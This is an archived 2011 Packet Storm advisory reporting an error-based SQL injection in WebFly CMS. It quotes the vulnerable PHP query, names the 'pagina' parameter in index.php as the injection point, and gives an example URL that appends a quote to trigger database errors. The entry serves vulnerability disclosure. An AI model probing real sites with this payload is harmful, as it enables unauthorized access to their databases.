WebFly CMS SQL Injection

2011-03-21T00:00:00
ID PACKETSTORM:99566
Type packetstorm
Reporter MasterGipy
Modified 2011-03-21T00:00:00

Description

                                        
                                            `[$] Exploit Title : WebFly CMS Error Based SQL Injection Vulnerability  
[$] Versions Affected : ALL  
[$] Date : 21-03-2011   
[$] Author : MasterGipy  
[$] Email : mastergipy [at] gmail.com  
[$] Bug : Error Based SQL Injection Vulnerability  
[$] Google Dork : [None]  
  
[$] Vulnerable code in /web/inc/paginas/inc.paginas.top.php  
  
$query_DetalhesPagina = sprintf("SELECT * FROM paginas WHERE ID = %s and Activo = 'Y'", GetSQLValueString($colname_DetalhesPagina, "int"));   
  
  
[$] Exploit  
  
[+] http://[site]/index.php?pagina=1 <- [ERROR BASED SQL INJECTION]  
  
  
[+] e.g.   
http://example.pt/index.php?pagina=2'  
  
  
  
[$] Greetings from PORTUGAL ^^  
  
  
  
`